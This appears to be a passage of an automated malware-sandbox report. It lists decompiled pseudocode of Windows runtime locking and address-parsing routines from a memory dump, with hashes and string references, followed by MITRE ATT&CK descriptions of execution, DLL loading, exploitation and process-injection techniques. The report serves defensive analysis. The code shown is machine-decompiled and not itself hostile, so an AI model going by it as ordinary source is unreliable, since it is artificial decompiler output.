				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x02b001c0;
									_push(_t92);
									_push(0);
									_t37 = E02A1F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02A64FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02A73F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02A73F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E02AA217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02A73F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02A63915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02A45384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E02A1F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02A63915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E02A1F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02A63915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E02A1F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02A63915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02A45329(_t74, _t92);
													_push(1);
													_t48 = E02A453A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x02a453ab
0x02a453ae
0x02a453b1
0x02a453b4
0x02a453b7
0x02a605b6
0x02a605c0
0x02a605c3
0x00000000
0x02a605c9
0x02a605c9
0x02a605cc
0x02a605d5
0x02a605d5
0x02a453bd
0x02a453bd
0x02a453bd
0x02a453be
0x02a453be
0x02a453be
0x02a453c0
0x00000000
0x00000000
0x02a82269
0x02a8226d
0x02a82349
0x02a8234d
0x02a82273
0x02a82276
0x02a82279
0x02a8227e
0x02a82283
0x02a82287
0x02a8228a
0x02a8228d
0x02a8228f
0x02a822bc
0x02a822bc
0x02a822bc
0x02a822be
0x02a822c4
0x02a822cc
0x02a822d0
0x02a822d6
0x02a822d7
0x02a822da
0x02a822df
0x02a822e4
0x00000000
0x00000000
0x02a822e6
0x02a822e9
0x02a822f4
0x02a822f9
0x02a822fa
0x02a82305
0x02a82314
0x02a82319
0x02a8231a
0x02a8231d
0x02a82320
0x02a82323
0x02a82323
0x02a82328
0x02a8232d
0x02a8232f
0x02a82331
0x02a82336
0x02a82336
0x02a8233b
0x02a8233d
0x02a82350
0x02a82351
0x02a82356
0x02a82359
0x02a82359
0x02a8235b
0x02a8235d
0x02a45367
0x02a4536b
0x02a45372
0x00000000
0x00000000
0x00000000
0x00000000
0x02a82363
0x02a82363
0x02a82369
0x02a8236a
0x02a8236c
0x02a82371
0x02a82373
0x00000000
0x02a82379
0x02a82379
0x02a8237a
0x02a8237f
0x02a8237f
0x02a82385
0x02a82386
0x02a82389
0x02a8238e
0x02a82390
0x02a45378
0x02a4537c
0x02a82396
0x02a82396
0x02a82397
0x02a8239c
0x02a823a2
0x02a823a3
0x02a823a6
0x02a823ab
0x02a823ad
0x00000000
0x02a823b3
0x02a823b3
0x02a823b4
0x02a823b9
0x02a823ba
0x02a823ba
0x02a823bc
0x02a823bf
0x00000000
0x00000000
0x02a79153
0x02a79158
0x02a7915a
0x02a7915e
0x02a79160
0x00000000
0x02a79166
0x02a79166
0x02a79171
0x02a79176
0x02a79176
0x00000000
0x02a79160
0x02a823c6
0x02a823cb
0x02a823ce
0x02a823d7
0x02a823d7
0x02a823ad
0x02a82390
0x02a82373
0x02a8233f
0x02a8233f
0x00000000
0x02a8233f
0x02a82291
0x02a82291
0x02a82293
0x02a82295
0x02a8229a
0x02a822a1
0x02a822a3
0x02a822a7
0x02a822a9
0x00000000
0x00000000
0x02a822ab
0x02a822ad
0x02a822af
0x00000000
0x00000000
0x00000000
0x02a822af
0x02a822b1
0x02a822b4
0x02a822b4
0x02a822b6
0x00000000
0x00000000
0x00000000
0x00000000
0x02a822b6
0x02a8228f
0x00000000
0x02a8226d
0x02a453cb
0x02a453ce
0x02a453d0
0x02a453d4
0x02a453d6
0x00000000
0x02a453d8
0x02a453e3
0x02a453ea
0x02a453ea
0x02a453d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A822F4

Strings

RTL: Resource at %p, xrefs: 02A8230B
RTL: Re-Waiting, xrefs: 02A82328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02A822FC

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: b39ec794efb223053ca874c08158b6318b5f6c0950ab1a6ea76cb851fee068b6
Instruction ID: fbe21c4e53b65c759d080318afc3d97bedccd13fcbd5424b88a42c969e48aec8
Opcode Fuzzy Hash: b39ec794efb223053ca874c08158b6318b5f6c0950ab1a6ea76cb851fee068b6
Instruction Fuzzy Hash: 945106716407456BEB11AB28CDD0FB673A9EF98724F114259FD49DB280EF61E8418FA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A4EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E02A4EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E02A3DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x2b0793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E02A216C0(_t39);
				} else {
					_t40 = E02A1F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02A63915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E02A201A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x2b0793c; // 0x0
								_push(_t85);
								_t44 = E02A21F28(_t71);
							} else {
								_t44 = E02A1F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02A63915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02AA2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E02A4EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02A64FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02A73F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02A73F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x2b020c0;
								if(_t85 != 0x2b020c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E02AA217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02A73F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x02a4ec56
0x02a4ec56
0x02a4ec56
0x02a4ec5c
0x02a4ec64
0x02a823e6
0x02a823eb
0x02a823eb
0x02a4ec6a
0x02a4ec6c
0x02a4ec6f
0x02a823f3
0x02a823f8
0x02a823fa
0x02a823fc
0x02a4ec75
0x02a4ec76
0x02a4ec76
0x02a4ec7b
0x02a4ec7c
0x02a4ec7e
0x02a82406
0x02a82407
0x02a8240c
0x02a8240d
0x02a8240d
0x02a8240d
0x02a82414
0x02a82417
0x02a8241e
0x02a82435
0x02a82438
0x02a8243c
0x02a8243f
0x02a82442
0x02a82443
0x02a82446
0x02a82449
0x02a82453
0x02a82455
0x02a8245b
0x02a8245b
0x02a4eb99
0x02a4eb99
0x02a4eb9c
0x02a4eb9d
0x02a4eb9f
0x02a4eba2
0x02a82465
0x02a8246b
0x02a8246d
0x02a4eba8
0x02a4eba9
0x02a4eba9
0x02a4ebae
0x02a4ebb3
0x02a4ebb9
0x02a4ebbb
0x02a82513
0x02a82514
0x02a82519
0x02a8251b
0x02a4ec2a
0x02a4ec2d
0x02a4ec33
0x02a4ec36
0x02a4ec3a
0x02a4ec3e
0x02a4ec40
0x02a4ec47
0x02a4ec47
0x02a4ec40
0x02a222c6
0x02a4ebc1
0x02a4ebc1
0x02a4ebc5
0x02a4ec9a
0x02a4ec9a
0x02a4ebd6
0x02a4ebd6
0x00000000
0x02a4ebbb
0x02a82477
0x02a8247c
0x02a82486
0x02a8248b
0x02a82496
0x02a8249b
0x02a8249d
0x02a824a0
0x02a824a3
0x02a824aa
0x02a824aa
0x02a824a5
0x02a824a5
0x02a824a5
0x02a824ac
0x02a824af
0x02a824b0
0x02a824b3
0x02a824b9
0x02a824ba
0x02a824bb
0x02a824c6
0x02a824cb
0x02a824cd
0x02a824d0
0x02a824d1
0x02a824d4
0x02a824d6
0x02a824d9
0x02a824d9
0x02a824dc
0x02a824df
0x02a824e1
0x02a824e7
0x02a824e9
0x02a824ec
0x02a824ef
0x02a824f2
0x02a824f2
0x02a824ef
0x02a824e7
0x02a824fa
0x02a824ff
0x02a82501
0x02a82503
0x02a82506
0x02a8250b
0x02a4eb8c
0x02a4eb93
0x00000000
0x00000000
0x02a4eb93
0x00000000
0x02a4eb99
0x02a4ec85
0x02a4ec85
0x02a4ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 02A824FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 02A824BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 02A8248D

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 8b13262b795a00fc3e8f0ae46cb72165fe75791f82689831c55cbdba4999d78c
Instruction ID: 559bf9dfb1439eb0b5e07fe483569b895149da70e5dd4d2cdaa9328da1788c88
Opcode Fuzzy Hash: 8b13262b795a00fc3e8f0ae46cb72165fe75791f82689831c55cbdba4999d78c
Instruction Fuzzy Hash: 1F41C670A40644BBDB20EB68CE89F6A77B9FF84720F208645F9559B2C0DF34E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02A5FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A5FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E02A5EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E02A5EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E02A5685D(_t167, 4) == 0) {
								if(E02A5685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E02A5685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E02A5685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02A38980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E02A2DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E02A5EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E02A5EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x02a5fcd1
0x02a5fcd6
0x02a5fcd9
0x02a5fcdc
0x02a5fcdf
0x02a5fce2
0x02a5fce5
0x02a5fce8
0x02a5fceb
0x02a5fced
0x02a5fced
0x02a5fcf3
0x00000000
0x00000000
0x02a5fcfc
0x02a5fcfe
0x02a5fdc1
0x02a8ecbd
0x00000000
0x02a8eccc
0x02a8eccc
0x02a8ecd2
0x00000000
0x00000000
0x02a8ecdf
0x02a8ece0
0x02a8ece4
0x02a8eceb
0x02a8ecee
0x02a8eca8
0x02a8eca8
0x02a8ecaa
0x02a5fd76
0x02a5fd79
0x02a5fdb4
0x02a5fdb5
0x02a5fdb6
0x00000000
0x02a5fdb6
0x02a5fd7e
0x02a8ecfc
0x02a5fe2f
0x00000000
0x02a5fe2f
0x02a8ed08
0x02a8ed0f
0x02a8ed17
0x02a8ed1b
0x00000000
0x02a8ed1b
0x02a5fd88
0x00000000
0x00000000
0x02a5fd94
0x02a5fd99
0x02a5fda1
0x00000000
0x00000000
0x02a5fdb0
0x00000000
0x02a5fdb0
0x02a8ecbd
0x02a5fdc7
0x02a5fdcb
0x00000000
0x02a5fdd7
0x02a5fde3
0x02a5fe06
0x02a71fe7
0x00000000
0x00000000
0x02a71fef
0x02a71ff0
0x02a71ff4
0x02a71ff7
0x02a71ffa
0x02a71ffd
0x02a72000
0x00000000
0x00000000
0x02a8ecf1
0x00000000
0x02a8ecf1
0x00000000
0x02a5fe06
0x02a5fde8
0x02a5fdec
0x02a5fdef
0x02a5fdf2
0x00000000
0x02a5fdf2
0x02a5fdcb
0x02a5fd04
0x02a5fd05
0x02a8ec67
0x00000000
0x00000000
0x02a8ec6f
0x00000000
0x02a8ec6f
0x02a5fd13
0x02a5fd3c
0x02a5fd40
0x02a8ec75
0x02a8ec7a
0x00000000
0x02a8ec8a
0x02a8ec8a
0x02a8ec90
0x02a8ecb2
0x02a5fd73
0x02a5fd73
0x00000000
0x02a5fd73
0x02a8ec95
0x00000000
0x00000000
0x02a8eca1
0x02a8eca4
0x02a8eca5
0x00000000
0x02a8eca5
0x02a8ec7a
0x02a5fd4a
0x00000000
0x02a5fd6e
0x02a5fd6e
0x02a5fd71
0x00000000
0x02a5fd71
0x02a5fd4a
0x02a5fd21
0x02a6a3a1
0x00000000
0x02a6a3a1
0x02a5fd36
0x02a7200b
0x02a72012
0x00000000
0x00000000
0x02a72018
0x00000000
0x02a72018
0x00000000
0x02a5fd36
0x02a5fe0f
0x02a5fe16
0x02a6a3ad
0x00000000
0x00000000
0x02a6a3b3
0x02a6a3b3
0x02a5fe1f
0x02a8ed25
0x02a8ed86
0x00000000
0x00000000
0x02a8ed91
0x02a8ed95
0x02a8ed95
0x02a8ed9a
0x02a8edad
0x02a8edb3
0x02a8edba
0x02a8edc4
0x02a8edc9
0x00000000
0x02a8edcc
0x02a8ed2a
0x02a8ed55
0x00000000
0x00000000
0x02a8ed61
0x02a8ed66
0x02a8ed6e
0x00000000
0x00000000
0x02a8ed7d
0x00000000
0x02a8ed7d
0x02a8ed30
0x00000000
0x00000000
0x02a8ed3c
0x02a8ed43
0x02a8ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 02A5FD94

Memory Dump Source

Source File: 0000000B.00000002.2350777014.0000000002A10000.00000040.00000001.sdmp, Offset: 02A00000, based on PE: true

Associated: 0000000B.00000002.2350772599.0000000002A00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350900442.0000000002AF0000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350905386.0000000002B00000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350910750.0000000002B04000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350916838.0000000002B07000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350921174.0000000002B10000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2350995003.0000000002B70000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 9cc6eed53301b321bdd54f08180af73a5f57c852651d8610f74be71893c979bc
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: A6918F71E0022AEEDF24DF59C9847AFB7B4EF46308F24806ADC15E6551EB305A45CF91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

